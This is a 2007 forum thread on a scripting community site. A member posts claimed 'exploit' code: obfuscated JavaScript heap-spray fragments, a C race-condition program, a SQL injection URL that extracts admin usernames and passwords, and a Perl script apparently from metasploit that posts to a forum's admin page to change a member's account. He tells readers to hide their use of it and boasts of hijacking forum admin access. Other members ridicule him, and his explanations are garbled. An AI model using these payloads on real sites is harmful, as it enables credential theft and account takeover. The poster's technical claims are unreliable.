Please login or register. Welcome to the Studio, guest!


Quick Links:


newBookmarkLockedFalling

H@kr 3XP|_0!tz

H@kr 3XP|_0!tz Avatar

**
Official Member

28


May 2007
I made a simple code that gives you ALOT[/b] of access to your users, I don't use this code. This is how it workes, It is a .exe called an "exploit" and some people say it gives you "unfare advantages" over your users. It is remotly like a virus, you can use this code for good, or bad you can use alot of programs for this such as MS Exall or I preffer Framework

the code is kinda malatios so keep it hidden and shut your mouth if you use it, and try as hard as you can to keep it away from the public and don't let Site Advisor catch you using the advantages!

function kgbItQgjwkTsYnvA() {
}
kgbItQgjwkTsYnvA.XK = function(maxAlloc, XPcAqRwEPAZhnqNytABase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.XPcAqRwEPAZhnqNytABase = (XPcAqRwEPAZhnqNytABase ? XPcAqRwEPAZhnqNytABase : 0x150000);
this.NEaCrNWavzlCx = "AAAA";
while (4 + this.NEaCrNWavzlCx.length*2 + 2 < this.maxAlloc) {
this.NEaCrNWavzlCx += this.NEaCrNWavzlCx;
...
XPcAqRwEPAZhnqNytA.pzMvSBZ();
for (var i = 0; i < 100; i++)
XPcAqRwEPAZhnqNytA.ebGXqe(MNaLfxJWihIGQAqPSokXf)
XPcAqRwEPAZhnqNytA.bNYYOglF(MNaLfxJWihIGQAqPSokXf);
for (var i = 0; i < 100; i++)
XPcAqRwEPAZhnqNytA.ebGXqe(0x2010)
XPcAqRwEPAZhnqNytA.fuuakTBEnTmfWlFMio(ZCPd, 2);
nBnqLM.KeyFrame(0x40000801, new Array(1), new Array(1));
delete XPcAqRwEPAZhnqNytA;


and

typedef struct _list_entry
{
struct _list_entry *next;
struct _list_entry *prev;
} list_entry;

list_entry *list = NULL;

list_entry *add()
{
list_entry *ent = (list_entry *)malloc(sizeof(list_entry));
if (list)
{
ent->prev = list->prev;
ent->next = list->next;
if (list->prev)
list->prev->next = ent;
if (list->next)
list->next->prev = ent;
}
list = ent;
return ent;
}

void remove(list_entry *ent)
{
if (ent->prev)
ent->prev->next = ent->next;
if (ent->next)
ent->next->prev = ent->prev;
free(ent);
}

void thread(void *nused)
{
while (1)
{
list_entry *ent = add();
remove(ent);
}
}

int main(int argc, char **argv)
{
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)thread, NULL, 0, NULL);
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)thread, NULL, 0, NULL);
thread(NULL);
}


If the codes infect your computer then the proccess is complete, I made the .exe simply grant access to the users password on the site, not other sites and won't grant full access to computers or IPs.

DO NOT ABUSE THIS PRIVALAGE!![/b][/u]


Last Edit: May 31, 2007 23:33:36 GMT by H@kr 3XP|_0!tz
- Large image removed -

Aaron

Aaron Avatar
Bad Wolf

****
Dedicated Studio Member

859


November 2006
One word: rofl.

H@kr 3XP|_0!tz

H@kr 3XP|_0!tz Avatar

**
Official Member

28


May 2007
lawl
- Large image removed -

Chris

Chris Avatar

******
Head Coder

19,519


June 2005
So, out of curiosity, why all the syntax errors? ;)

Aaron

Aaron Avatar
Bad Wolf

****
Dedicated Studio Member

859


November 2006
cddude229 said:
So, out of curiosity, why all the syntax errors? ;)


Because rofl, that's why. ;)

H@kr 3XP|_0!tz

H@kr 3XP|_0!tz Avatar

**
Official Member

28


May 2007
cddude229 said:
So, out of curiosity, why all the syntax errors? ;)


You all don't know how to manage exploits the [/li][li] are important, simple javaScript is nothing compared to my work!! If you want more exploit here they go!

HEADER[/u]
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt


like many codes this one is a link (it leads to a malatious site do not click it)
The code above leads the injection for the code possible without trace, so you can accually post the exploit with an effect.

ALSO IN HEADER/b]
#!perl
#http://ipigroup.org/downloads/forums.zip
#Bl0od3r
#United States
#Whassup to all members of http://studiozero44.com/index.cgi
#special to chris
use IO::Socket;
if (@ARGV<4) {
&header;
} else { &start };

sub start() {
$host=$ARGV[0];
$path=$ARGV[1];
$user=$ARGV[2];
$passwd=$ARGV[3];
$post="usersname=".$user."&password=".$passwd."&email=test%40test.com&name=Dummy+user&tagline=Im+a+dumy+user&location=Ohio&bday=1983-11-20&job=Being+a+test+dummy&interests=Anything&bio=I%5C%5C%5C%27ve+been+sitting+on+this+db+my+whole+life.++HELP%21&signature=This+is+my+signature.&url=http%3A%2F%2Fipigroup.org&aim=myaim&yahoo=myyahoo&msn=mymsn%40hotmail.com&icq=546546&submitupdate=Update";
$len=length($post);
$sock=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die ("Error");
print $sock "POST ".$path."admin/index.php?p=members&edit=".$chris." HTTP/1.0\n";
print $sock "Host: ".$host."\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$len."\n\n";
print $sock $post;

print "[+]Seems like your account has been created!Now try to login in :";
print "\n[+]User:$user\t[+]Password:$passwd";
}

sub header() {
print("
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\t\t~~iPrimal Forums Users(ChangePass) 3xPl0!t~~
\t\t[+]By Mega-Ballin-Pimp-$ev
\t\t[+]A.K.A. $eve$hot
\t\t[+]A.K.A. lynxgawd
\t\t[+]Usage:script.pl owned.org /script/ admin yes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
");
}

# metasploit.com [2007-05-31]


The top one will send a PM to the admion and change his password I edited it to send to "chris" this will grant full access to chris to the user, you can do this to anybody to check the passwords they entered ;)

FOOTER
[/u]
http://www.metasploit.com

w00t!!
PWNED!!!

and if you want more you can ttalk to me. I have also igured out how to screw over a proboards, you can add ?action=hack/headersandfooters andadd a code (I will not post it so, I cannot tell people how to hack this site) but you cannot write in the footers, you can copy/paste them without the code when you have posted the hidden code you can have full admin. And have privillages that the admin now doesen't even have........ yet.

Chris, PM me.
- Large image removed -

H@kr 3XP|_0!tz

H@kr 3XP|_0!tz Avatar

**
Official Member

28


May 2007
Anyway, what syntax errors where you reffering to???
- Large image removed -

Tobias

Tobias Avatar

***
Dedicated Member

182


November 2006
The ones that were supposed to be in perl, not javascipt.
#intj (Mastermind)^

H@kr 3XP|_0!tz

H@kr 3XP|_0!tz Avatar

**
Official Member

28


May 2007
tobias said:
The ones that were supposed to be in perl, not javascipt.


What are you all not getting? I know everything there is to know about that site!! Me adn Alex made it in '03!!

The proboards H/F Are not only JavaScript, but they are any type of script, if you would read the whole metasploit page you would understand the scripts.


Last Edit: Jun 3, 2007 2:07:06 GMT by H@kr 3XP|_0!tz
- Large image removed -

Chris

Chris Avatar

******
Head Coder

19,519


June 2005
Yes, they're not only JavaScript, but you also can not execute Perl in headers/footers mate. I've tried quite a few times. ProBoards isn't 100% secure, but it also isn't vulnerable to something so easily executed.

Kahless™

Kahless™ Avatar
Coding noob

****
Senior Member

280


October 2005
lol, priceless
"In the end, we will not remember the words of our enemies, but the silence of our friends." Martin Luther King


Simie

Simie Avatar

******
ProScripter

1,052


May 2006
*chuckles*

This thread gave me a few laughs :P

mukei

mukei Avatar

****
Senior Member

481


July 2006
roflmao.

newBookmarkLockedFalling